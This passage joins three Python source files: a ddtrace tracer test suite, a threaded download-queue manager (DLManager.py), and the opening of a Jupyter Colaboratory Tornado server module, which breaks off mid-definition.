from .utils.tracer import DummyTracer
from .utils.tracer import DummyWriter # noqa
from ddtrace.internal.writer import LogWriter, AgentWriter
def get_dummy_tracer():
return DummyTracer()
class TracerTestCase(BaseTracerTestCase):
def test_tracer_vars(self):
span = self.trace('a', service='s', resource='r', span_type='t')
span.assert_matches(name='a', service='s', resource='r', span_type='t')
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace('a')
span.assert_matches(name='a', service=None, resource='a', span_type=None)
def test_tracer(self):
def _mix():
with self.trace('cake.mix'):
pass
def _bake():
with self.trace('cake.bake'):
pass
def _make_cake():
with self.trace('cake.make') as span:
span.service = 'baker'
span.resource = 'cake'
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name='cake.make', resource='cake', service='baker', parent_id=None),
(
# Span with no children
dict(name='cake.mix', resource='cake.mix', service='baker'),
# Span with no children
dict(name='cake.bake', resource='cake.bake', service='baker'),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap('decorated_function', service='s', resource='r', span_type='t')
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f('a', 'b')
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name='decorated_function', service='s', resource='r', span_type='t', meta=dict(a='b'),
)
def test_tracer_pid(self):
with self.trace('root') as root_span:
with self.trace('child') as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name='tests.test_tracer.f'))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception('bim')
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name='tests.test_tracer.f',
error=1,
meta={
'error.msg': ex.message,
'error.type': ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap('inner')
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, 'outer')
@self.tracer.wrap('outer')
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, 'outer')
with self.trace('mid'):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, 'outer')
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap('inner')
def inner():
pass
@self.tracer.wrap('outer')
def outer():
with self.trace('mid'):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name='outer'),
(
(
dict(name='mid'),
(
dict(name='inner'),
)
),
),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name='tests.test_tracer.s')
self.spans[1].assert_matches(name='tests.test_tracer.c')
self.spans[2].assert_matches(name='tests.test_tracer.i')
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace('wrap.overwrite') as span:
span.set_tag('args', args)
span.set_tag('kwargs', kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name='wrap.overwrite',
meta=dict(args='(42,)', kwargs='{\'kw_param\': 42}'),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace('wrap.overwrite') as span:
span.set_tag('args', args)
span.set_tag('kwargs', kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace('wrap.parent', service='webserver'):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name='wrap.parent', service='webserver'),
(
dict(
name='wrap.overwrite',
service='webserver',
meta=dict(args='(42,)', kwargs='{\'kw_param\': 42}')
),
),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace('foo') as s:
s.set_tag('a', 'b')
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace('foo') as s:
s.set_tag('a', 'b')
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest('numpy not installed')
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace('parent') as span:
span.metrics['as'] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace('foo')
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace('bar')
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace('brie')
s1.finish()
self.assertIsNone(s1.get_tag('env'))
self.assertIsNone(s1.get_tag('other'))
self.tracer.set_tags({'env': 'prod'})
s2 = self.trace('camembert')
s2.finish()
self.assertEqual(s2.get_tag('env'), 'prod')
self.assertIsNone(s2.get_tag('other'))
self.tracer.set_tags({'env': 'staging', 'other': 'tag'})
s3 = self.trace('gruyere')
s3.finish()
self.assertEqual(s3.get_tag('env'), 'staging')
self.assertEqual(s3.get_tag('other'), 'tag')
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace('fake_span')
ctx = self.tracer.get_call_context()
self.assertEqual(len(ctx._trace), 1)
self.assertEqual(ctx._trace[0], span)
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace('fake_span')
self.assertEqual(self.tracer.current_span(), span)
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
self.assertTrue(isinstance(ctx, Context))
self.assertEqual(len(ctx._trace), 0)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace('web.request')
span.assert_matches(name='web.request', trace_id=42, parent_id=100)
def test_default_provider_trace(self):
# Context handled by a default provider must be used
# when creating a trace
span = self.trace('web.request')
ctx = self.tracer.context_provider.active()
self.assertEqual(len(ctx._trace), 1)
self.assertEqual(span._context, ctx)
def test_start_span(self):
# it should create a root Span
span = self.start_span('web.request')
span.assert_matches(
name='web.request',
tracer=self.tracer,
_parent=None,
parent_id=None,
)
self.assertIsNotNone(span._context)
self.assertEqual(span._context._current_span, span)
def test_start_span_optional(self):
# it should create a root Span with arguments
span = self.start_span('web.request', service='web', resource='/', span_type='http')
span.assert_matches(
name='web.request',
service='web',
resource='/',
span_type='http',
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(
service=None
)
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
child = self.start_span("child", child_of=parent)
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
span = self.start_span("")
span.assert_matches(
service="mysvc"
)
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
child = self.start_span("child", child_of=parent)
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
parent = self.start_span('web.request')
child = self.start_span('web.worker', child_of=parent)
parent.assert_matches(
name='web.request',
parent_id=None,
_context=child._context,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name='web.worker',
parent_id=parent.span_id,
_context=parent._context,
_parent=parent,
tracer=self.tracer,
)
self.assertEqual(child._context._current_span, child)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
parent = self.start_span('web.request', service='web', resource='/', span_type='http')
child = self.start_span('web.worker', child_of=parent)
child.assert_matches(name='web.worker', service='web')
def test_start_child_from_context(self):
# it should create a child span with a populated Context
root = self.start_span('web.request')
context = root.context
child = self.start_span('web.worker', child_of=context)
child.assert_matches(
name='web.worker',
parent_id=root.span_id,
trace_id=root.trace_id,
_context=root._context,
_parent=root,
tracer=self.tracer,
)
self.assertEqual(child._context._current_span, child)
def test_adding_services(self):
self.assertEqual(self.tracer._services, set())
root = self.start_span('root', service='one')
context = root.context
self.assertSetEqual(self.tracer._services, set(['one']))
self.start_span('child', service='two', child_of=context)
self.assertSetEqual(self.tracer._services, set(['one', 'two']))
def test_configure_runtime_worker(self):
# by default runtime worker not started though runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_host(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
self.tracer.configure(dogstatsd_host='foo')
assert self.tracer._dogstatsd_client.host == 'foo'
assert self.tracer._dogstatsd_client.port == 8125
# verify warnings triggered
assert len(w) == 1
assert issubclass(w[-1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert 'Use `dogstatsd_url`' in str(w[-1].message)
def test_configure_dogstatsd_host_port(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
self.tracer.configure(dogstatsd_host='foo', dogstatsd_port='1234')
assert self.tracer._dogstatsd_client.host == 'foo'
assert self.tracer._dogstatsd_client.port == 1234
# verify warnings triggered
assert len(w) == 2
assert issubclass(w[0].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert 'Use `dogstatsd_url`' in str(w[0].message)
assert issubclass(w[1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert 'Use `dogstatsd_url`' in str(w[1].message)
def test_configure_dogstatsd_url_host_port(self):
self.tracer.configure(dogstatsd_url='foo:1234')
assert self.tracer._dogstatsd_client.host == 'foo'
assert self.tracer._dogstatsd_client.port == 1234
def test_configure_dogstatsd_url_socket(self):
self.tracer.configure(dogstatsd_url='unix:///foo.sock')
assert self.tracer._dogstatsd_client.host is None
assert self.tracer._dogstatsd_client.port is None
assert self.tracer._dogstatsd_client.socket_path == '/foo.sock'
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
root = self.start_span('root')
context = root.context
child = self.start_span('child', child_of=context)
self.assertIsNone(root.get_tag('language'))
self.assertIsNone(child.get_tag('language'))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
root = self.start_span('root', span_type=span_type)
context = root.context
child = self.start_span('child', child_of=context)
self.assertEqual(root.get_tag('language'), 'python')
self.assertIsNone(child.get_tag('language'))
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("algoliasearch.search", "boto", "cache", "cassandra", "elasticsearch",
"grpc", "kombu", "http", "memcached", "redis", "sql", "vertica"):
root = self.start_span('root', span_type=span_type)
context = root.context
child = self.start_span('child', child_of=context)
self.assertIsNone(root.get_tag('language'))
self.assertIsNone(child.get_tag('language'))
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.api.hostname == 'localhost'
assert t.writer.api.port == 8126
t = ddtrace.Tracer(url='http://foobar:12')
assert t.writer.api.hostname == 'foobar'
assert t.writer.api.port == 12
t = ddtrace.Tracer(url='unix:///foobar')
assert t.writer.api.uds_path == '/foobar'
t = ddtrace.Tracer(url='http://localhost')
assert t.writer.api.hostname == 'localhost'
assert t.writer.api.port == 80
assert not t.writer.api.https
t = ddtrace.Tracer(url='https://localhost')
assert t.writer.api.hostname == 'localhost'
assert t.writer.api.port == 443
assert t.writer.api.https
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(url='foo://foobar:12')
assert str(e) == 'Unknown scheme `https` for agent URL'
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert not t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=None)
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t._dogstatsd_client.host == 'localhost'
assert t._dogstatsd_client.port == 8125
t = ddtrace.Tracer(dogstatsd_url='foobar:12')
assert t._dogstatsd_client.host == 'foobar'
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url='udp://foobar:12')
assert t._dogstatsd_client.host == 'foobar'
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url='/var/run/statsd.sock')
assert t._dogstatsd_client.socket_path == '/var/run/statsd.sock'
t = ddtrace.Tracer(dogstatsd_url='unix:///var/run/statsd.sock')
assert t._dogstatsd_client.socket_path == '/var/run/statsd.sock'
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url='foo://foobar:12')
assert str(e) == 'Unknown url format for `foo://foobar:12`'
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace('test', service='test') as span:
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._trace_queue != original_writer._trace_queue
# Assert the trace got written into the correct queue
assert original_writer._trace_queue.qsize() == 0
assert t.writer._trace_queue.qsize() == 1
assert [[span]] == list(t.writer._trace_queue.get())
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
while errors.qsize() > 0:
raise errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace('test', service='test') as span:
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._trace_queue == original_writer._trace_queue
# Assert the trace got written into the correct queue
assert original_writer._trace_queue.qsize() == 1
assert t.writer._trace_queue.qsize() == 1
assert [[span]] == list(t.writer._trace_queue.get())
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with BaseTracerTestCase.override_global_config(dict(version='1.2.3')):
with t.trace('test.span') as span:
assert span.get_tag(VERSION_KEY) == '1.2.3'
# override manually
span.set_tag(VERSION_KEY, '4.5.6')
assert span.get_tag(VERSION_KEY) == '4.5.6'
# With no `config.version` defined
with t.trace('test.span') as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, '1.2.3')
assert span.get_tag(VERSION_KEY) == '1.2.3'
# With global tags set
t.set_tags({VERSION_KEY: 'tags.version'})
with BaseTracerTestCase.override_global_config(dict(version='config.version')):
with t.trace('test.span') as span:
assert span.get_tag(VERSION_KEY) == 'config.version'
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with BaseTracerTestCase.override_global_config(dict(env='prod')):
with t.trace('test.span') as span:
assert span.get_tag(ENV_KEY) == 'prod'
# override manually
span.set_tag(ENV_KEY, 'prod-staging')
assert span.get_tag(ENV_KEY) == 'prod-staging'
# With no `config.env` defined
with t.trace('test.span') as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, 'prod-staging')
assert span.get_tag(ENV_KEY) == 'prod-staging'
# With global tags set
t.set_tags({ENV_KEY: 'tags.env'})
with BaseTracerTestCase.override_global_config(dict(env='config.env')):
with t.trace('test.span') as span:
assert span.get_tag(ENV_KEY) == 'config.env'
class EnvTracerTestCase(BaseTracerTestCase):
"""Tracer test cases requiring environment variables.
"""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
span = self.start_span("")
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
span = self.start_span("")
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
|
DLManager.py
|
from .packer import Packer
import time, threading
class Manager(Packer, object):
def __init__(self):
self.tasks = {}
self.id_map = []
self.name_id = {}
self.max_task = 2
self.queue = TaskQueue()
self._insp_thr = None
self.shutdown_flag = False
self.all_pause_flag = True
self.__queue_lock__ = threading.RLock()
self._done_buff = []
def __insp__(self):
while True:
self.checkRunQueue()
if self.shutdown_flag or self.all_pause_flag:
self.checkRunQueue()
break
self.run()
if not self.queue.undone and self.isEnd():
self.checkRunQueue()
break
time.sleep(0.01)
def checkRunQueue(self):
with self.__queue_lock__:
for i in list(self.queue.run):
if self.tasks[i].isEnd():
self.tasks[i].close()
self.queue.run.remove(i)
self.queue.done.append(i)
self._done_buff.append(i)
def getHandler(self, name=None, id=None):
if name is None and id is None:
return None
if id is not None:
return self.tasks[id]
if name is not None:
return self.tasks[self.getIdFromName(name)]
def getAllTask(self):
return self.tasks
def getRunQueue(self):
return self.queue.run
def getPauseQueue(self):
return self.queue.pause
def getDoneQueue(self):
return self.queue.done
def getUndoneQueue(self):
return self.queue.undone
def getIdFromName(self, name):
return self.name_id[name]
def getNameFromId(self, id):
for i, j in self.name_id.items():
if id == j:
return i
def addHandler(self, Handler, name=None):
with self.__queue_lock__:
id = self.newId()
name = id if not name else name
self.tasks[id] = Handler
self.name_id[name] = id
self.id_map[id] = True
self.queue.undone.append(id)
return id
def newId(self):
for i, j in enumerate(self.id_map):
if not j:
return i
else:
self.id_map.append(False)
return len(self.id_map) - 1
def remove(self, id):
with self.__queue_lock__:
del self.tasks[id]
self.id_map[id] = False
            del self.name_id[self.getNameFromId(id)]
def run(self, id=None):
with self.__queue_lock__:
self.all_pause_flag = False
            if not self._insp_thr or not self._insp_thr.is_alive():
self._insp_thr = threading.Thread(target=self.__insp__, name='Nbdler-Manager')
self._insp_thr.start()
if id is not None:
if len(self.queue.run) < self.max_task:
self.tasks[id].run()
self.queue.run.append(id)
else:
for i in list(self.queue.undone):
if len(self.queue.run) < self.max_task:
# if not self.tasks[i].isEnd():
self.tasks[i].run()
self.queue.run.append(i)
if i in self.queue.pause:
self.queue.pause.remove(i)
self.queue.undone.remove(i)
def pause(self, id=None):
self._done_buff = []
if id is not None:
self.tasks[id].pause()
with self.__queue_lock__:
if id in self.queue.run:
self.queue.run.remove(id)
if id not in self.queue.pause:
self.queue.pause.append(id)
else:
self.all_pause_flag = True
self._insp_thr.join()
with self.__queue_lock__:
for i in list(self.getRunQueue()):
threading.Thread(target=self.tasks[i].pause).start()
if i in self.queue.run:
self.queue.run.remove(i)
if i not in self.queue.pause:
self.queue.pause.append(i)
self.checkRunQueue()
def shutdown(self):
self._done_buff = []
self.shutdown_flag = True
if self._insp_thr:
self._insp_thr.join()
for i in self.tasks.values():
threading.Thread(target=i.shutdown).start()
def close(self):
pass
def join(self):
if not self._insp_thr:
if not self.isEnd():
self.run()
else:
return
# raise RuntimeError('cannot join thread before it is started')
self._insp_thr.join()
for i in self.tasks.values():
i.join()
def getAvgSpeed(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getAvgSpeed()
speed = 0
for i in self.queue.run:
if not self.tasks[i].isEnd():
speed += self.tasks[i].getAvgSpeed()
return speed
def getInsSpeed(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getInsSpeed()
speed = 0
for i in self.queue.run:
speed += self.tasks[i].getInsSpeed()
for i in list(self._done_buff):
tmp = self.tasks[i].getInsSpeed()
speed += tmp
if tmp < 100:
self._done_buff.remove(i)
# self._done_buff = []
return speed
def getIncByte(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getIncByte()
inc = 0
for i in self.queue.done:
inc += self.tasks[i].getFileSize()
for i in self.queue.run:
dl = self.tasks[i]
inc += dl.getFileSize() - dl.getLeft()
return inc
def getFileSize(self, id=None):
if id is not None:
return self.tasks[id].getFileSize()
return self.getTotalSize()
def getTotalSize(self):
size = 0
for i, j in self.tasks.items():
size += j.getFileSize()
return size
def getLeft(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getLeft()
left = 0
for i in self.queue.run:
if not self.tasks[i].isEnd():
left += self.tasks[i].getLeft()
for i in self.queue.undone:
left += self.tasks[i].getLeft()
return left
def isEnd(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].isEnd()
for i in self.queue.run:
if not self.tasks[i].isEnd():
break
else:
return True if not self.queue.undone else False
return False
def config(self, **kwargs):
for i, j in self.__config_params__():
if i in kwargs:
setattr(self, j, kwargs[i])
def __config_params__(self):
return [('max_task', 'max_task')]
def __packet_params__(self):
return ['tasks', 'max_task']
def unpack(self, packet):
Packer.unpack(self, packet)
class TaskQueue(object):
def __init__(self):
self.run = []
self.pause = []
self.undone = []
self.done = []
self.ready = []
|
colaboratory.py
|
# coding: utf-8
"""Colaboratory: the Jupyter Collaborative Computational Laboratory.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import errno
import json
import logging
import os
import random
import select
import signal
import socket
import sys
import threading
import webbrowser
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.html')
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The Jupyter Colaboratory requires tornado >= 3.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (3,1,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.log import LogFormatter
from IPython.html import DEFAULT_STATIC_FILES_PATH
from IPython.html.log import log_request
from IPython.html.services.kernels.kernelmanager import MappingKernelManager
from IPython.html.base.handlers import (FileFindHandler, IPythonHandler)
from IPython.config.application import catch_config_error
from IPython.core.application import (
BaseIPythonApplication, base_flags, base_aliases,
)
from IPython.core.profiledir import ProfileDir
from IPython.kernel import KernelManager
from IPython.kernel.zmq.session import default_secure, Session
from IPython.utils.importstring import import_item
from IPython.utils import submodule
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes,
DottedObjectName,
)
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
pjoin = os.path.join
here = os.path.dirname(__file__)
RESOURCES = pjoin(here, 'resources')
_examples = """
colab # start the server
colab --profile=sympy # use the sympy profile
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
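# Illustrative usage sketch (not part of the original module): the first few
# candidates are sequential, the rest are random jitter around the requested
# port, which is how the app retries when the default port is already taken.
# The name _example_port_candidates is hypothetical.
def _example_port_candidates():
    return list(random_ports(8844, 8))  # e.g. [8844, 8845, 8846, 8847, 8848, 8852, 8836, 8859]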
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'IPython.html.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class SingleStaticFileHandler(web.StaticFileHandler):
def get_absolute_path(self, root, path):
p = os.path.abspath(os.path.join(self.root, self.default_filename))
return p
class NotebookHandler(IPythonHandler):
def get(self, path='', name=None):
self.write(self.render_template('notebook.html',
raw='1',
app_mode=False))
class WelcomeHandler(IPythonHandler):
def get(self, path='', name=None):
self.write(self.render_template('welcome.html',
raw='1',
app_mode=False))
class ColaboratoryWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options):
settings = self.init_settings(
ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(ColaboratoryWebApplication, self).__init__(handlers, **settings)
def init_settings(self, ipython_app, kernel_manager, notebook_manager,
session_manager,
log, settings_overrides,
jinja_env_options=None):
template_path = settings_overrides.get("template_path", os.path.join(RESOURCES, "colab"))
jenv_opt = jinja_env_options if jinja_env_options else {}
        env = Environment(loader=FileSystemLoader(template_path), **jenv_opt)
settings = dict(
# basics
log_function=log_request,
base_url='/',
template_path=template_path,
# authentication
cookie_secret=ipython_app.cookie_secret,
login_url='/login',
password=ipython_app.password,
# managers
kernel_manager=kernel_manager,
notebook_manager=notebook_manager,
session_manager=session_manager,
# IPython stuff
config=ipython_app.config,
jinja2_env=env,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
# Load the (URL pattern, handler) tuples for each component.
here = os.path.dirname(__file__)
colab = pjoin(RESOURCES, 'colab')
handlers = [(r'/', web.RedirectHandler, {'url':'/welcome'}),
(r'/welcome(/?)', WelcomeHandler, {}),
(r'/notebook(/?)', NotebookHandler, {}),
(r'/colab/(.*)', web.StaticFileHandler,
{'path': colab}),
(r'/extern/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'extern')}),
(r'/closure/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'closure-library', 'closure', 'goog')}),
(r'/ipython/(.*)', FileFindHandler,
{'path': [pjoin(RESOURCES, 'ipython_patch'), DEFAULT_STATIC_FILES_PATH]}),
]
handlers.extend(load_handlers('base.handlers'))
handlers.extend(load_handlers('services.kernels.handlers'))
handlers.extend(load_handlers('services.sessions.handlers'))
return handlers
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(base_flags)
flags['no-browser']=(
{'ColaboratoryApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
# Add notebook manager flags
aliases = dict(base_aliases)
aliases.update({
'ip': 'ColaboratoryApp.ip',
'port': 'ColaboratoryApp.port',
'port-retries': 'ColaboratoryApp.port_retries',
